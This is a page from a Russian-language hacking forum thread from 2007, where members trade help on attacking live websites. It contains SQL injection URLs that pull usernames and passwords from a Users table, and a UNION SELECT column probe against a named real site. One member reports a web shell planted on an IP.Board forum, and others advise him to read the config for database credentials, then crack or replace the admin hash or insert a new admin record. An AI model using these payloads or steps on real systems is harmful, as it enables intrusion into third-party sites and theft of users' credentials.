Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. fervex

    fervex New Member

    Joined:
    12 Nov 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    что, UPDATE никак не получится корректно поставить в запрос? А где "выше написано"?
     
  2. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Не в этом дело, в mysql через инъекцию изменять информацию в БД нельзя
     
  3. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Code:
    .asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)%2B%27%3A%27%2Bcast(UserPassword+as+nvarchar)+from+Users)-
    получаю
    Что не так?
     
  4. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    не получится ибо в подзапросах тока select и после union тоже тока select
    если инъекция в update, то мона, но это зависит от конкретных условий. Если всё удачно, то мона и файлы читать, и выводить всё чё те надо.
     
    _________________________
  5. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    .
    Code:
    asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)+':'+cast(UserPassword+as+nvarchar)+from+Users)--
    непонял я для чего ты cast использовал, мож там кавычки %27 фильтруются, да и вобще, нах cast то надо?
    если захотел как суперхеккер сделать то можно весь подзапрос в каст взять, но думаю это не обязательно в твоем случае
     
    #345 Scipio, 26 Nov 2007
    Last edited: 26 Nov 2007
  6. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Я делал как дядя Cash прописал в своей статье.... Покажи тогда пример запроса.
     
  7. xaker-boss

    xaker-boss Elder - Старейшина

    Joined:
    6 Mar 2007
    Messages:
    251
    Likes Received:
    49
    Reputations:
    -11
    народ, я залил шел на IP.Board 2.2.2 © 2007 IPS, Inc. как теперь можно узнать пароль от админки??если можно и несложо обясните поподробние плиз
     
  8. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    смотришь когфиг, там пасс, юзер и адрес от БД.
    Заходишь в эту бд. Смотришь таблтцу с юзверями
    Ищешь админа - брутишь хэш.
    Меньше мороки - просто меняешь хэш
    А лучше - вставить новую запись
     
  9. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ищи конфиг форума, там будет логин и пасс от СУБД, конектишься с этим пасом к базе и ищешь таблицу с юзерами
     
  10. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Code:
    asp?id=1+or+1=(SELECT+TOP+1+UserLogin%2bCHAR(58)%2bUserPassword+from+Users)--
    ну как то так
     
  11. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    http://www.pp-pss.ru/main.php?ID=-1
    помогите пожалуйста со скулем перебрал до 41 поля
    http://www.pp-pss.ru/main.php?ID=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
    замучился может по другому как то надо
     
    2 people like this.
  12. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Мимо, проверяй пм.
     
  13. sedoy_xxx

    sedoy_xxx Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    244
    Likes Received:
    41
    Reputations:
    -1
    Он же не ругается да different column а тупо выводит твой запрос. Эдак до потери пульса можно подбирать =) Смотри что там фильтруется и меняй запрос.
     
  14. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    http://www.pp-pss.ru/main.php?ID=

    1 колонка. без вывода. если мускул выше 4.0.* то возможен посимвольный перебор//

    но тут 4.0.*. .поэтому он невозможен)
     
  15. YaNeLam

    YaNeLam Member

    Joined:
    23 Oct 2007
    Messages:
    23
    Likes Received:
    19
    Reputations:
    -10
    Если в ссылке на Личное письмо в IPB 1.3 подставить в конце ' , то вместо
    Напишет вот что :
    .Просто пустой текст.Что это может быть?
    Также если по той же самой ссылке поставить '; -- то выдаст пустой текст ошибки.
     
  16. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    ИМХО: ничего!
    инъекта там нет
     
    1 person likes this.
  17. YaNeLam

    YaNeLam Member

    Joined:
    23 Oct 2007
    Messages:
    23
    Likes Received:
    19
    Reputations:
    -10
    [aywo]
    А там вообще чего есть?
     
  18. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    2YaNeLam что ты имеешь ввиду?
     
  19. YaNeLam

    YaNeLam Member

    Joined:
    23 Oct 2007
    Messages:
    23
    Likes Received:
    19
    Reputations:
    -10
    ну там вообще на Ipb 1.3 патченом есть Sql?
     
  20. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    тебе сюда _https://forum.antichat.ru/thread15678.html
     
    4 people like this.
Thread Status:
Not open for further replies.